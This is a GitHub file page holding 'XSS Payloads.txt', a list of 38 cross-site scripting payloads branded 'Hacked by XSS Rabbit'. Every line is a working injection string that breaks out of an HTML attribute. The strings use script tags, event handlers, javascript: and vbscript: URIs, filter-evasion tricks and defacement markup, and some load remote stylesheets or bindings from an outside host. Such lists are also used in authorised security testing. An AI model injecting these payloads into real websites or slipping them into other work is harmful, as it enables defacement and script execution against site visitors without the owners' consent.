-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathXSS Payloads.txt
38 lines (38 loc) · 2.86 KB
/
XSS Payloads.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
"""><script>alert('Hacked by XSS Rabbit')</script>
"""><script>alert("Hacked by XSS Rabbit");</script>
""">javascript:alert("Hacked by XSS Rabbit")
"""><img src="javascript:alert('Hacked by XSS Rabbit');">
"""><img src=javascript:alert("Hacked by XSS Rabbit")>
"""><IFRAME SRC="javascript:alert('Hacked by XSS Rabbit');"></IFRAME><SCRIPT a=">" SRC="Hacked by XSS Rabbit"></SCRIPT>
"""><SCRIPT a=">" '' SRC="Hacked by XSS Rabbit"></SCRIPT>
"""><SCRIPT "a='>'" SRC="Hacked by XSS Rabbit"></SCRIPT>
"""><SCRIPT a=">'>" SRC="Hacked by XSS Rabbit"></SCRIPT>
"""><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="Hacked by XSS Rabbit"></SCRIPT>
"""><<SCRIPT>alert("Hacked by XSS Rabbit");//<</SCRIPT>
"""><h1><font color=blue>Hacked by XSS Rabbit</h1>
"""><BODY ONLOAD=alert('Hacked by XSS Rabbit')>
"""><input onfocus=write(Hacked by XSS Rabbit) autofocus>
"""><input onblur=write(Hacked by XSS Rabbit) autofocus><input autofocus>
"""><body onscroll=alert(Hacked by XSS Rabbit)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
"""><form><button formaction="javascript:alert(Hacked by XSS Rabbit)">lol
"""><!--<img src="--><img src=x onerror=alert(Hacked by XSS Rabbit)//">
"""><![><img src="]><img src=x onerror=alert(Hacked by XSS Rabbit)//">
"""><style><img src="</style><img src=x onerror=alert(Hacked by XSS Rabbit)//">
"""><SCRIPT>alert(/Hacked by XSS Rabbit/.source)</SCRIPT>
""">\\";alert('Hacked by XSS Rabbit');//
"""></TITLE><SCRIPT>alert(\"Hacked by XSS Rabbit\");</SCRIPT>
"""><INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('Hacked by XSS Rabbit');\">
"""><BODY BACKGROUND=\"javascript:alert('Hacked by XSS Rabbit')\">
"""><BODY ONLOAD=alert('Hacked by XSS Rabbit')>
"""><IMG DYNSRC=\"javascript:alert('Hacked by XSS Rabbit')\">
"""><IMG LOWSRC=\"javascript:alert('Hacked by XSS Rabbit')\">
"""><BGSOUND SRC=\"javascript:alert('Hacked by XSS Rabbit');\">
"""><BR SIZE=\"&{alert('Hacked by XSS Rabbit')}\">
"""><LINK REL=\"stylesheet\" HREF=\"javascript:alert('Hacked by XSS Rabbit');\">
"""><LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/Hacked by XSS Rabbit.css\">
"""><STYLE>@import'http://ha.ckers.org/Hacked by XSS Rabbit.css';</STYLE>
"""><META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/Hacked by XSS Rabbit.css>; REL=stylesheet\">
"""><STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/Hacked by XSS Rabbitmoz.xml#Hacked by XSS Rabbit\")}</STYLE>
"""><Hacked by XSS Rabbit STYLE=\"behavior: url(Hacked by XSS Rabbit.htc);\">
"""><STYLE>li {list-style-image: url(\"javascript:alert('Hacked by XSS Rabbit')\");}</STYLE><UL><LI>Hacked by XSS Rabbit
"""><IMG SRC='vbscript:msgbox(\"Hacked by XSS Rabbit\")'>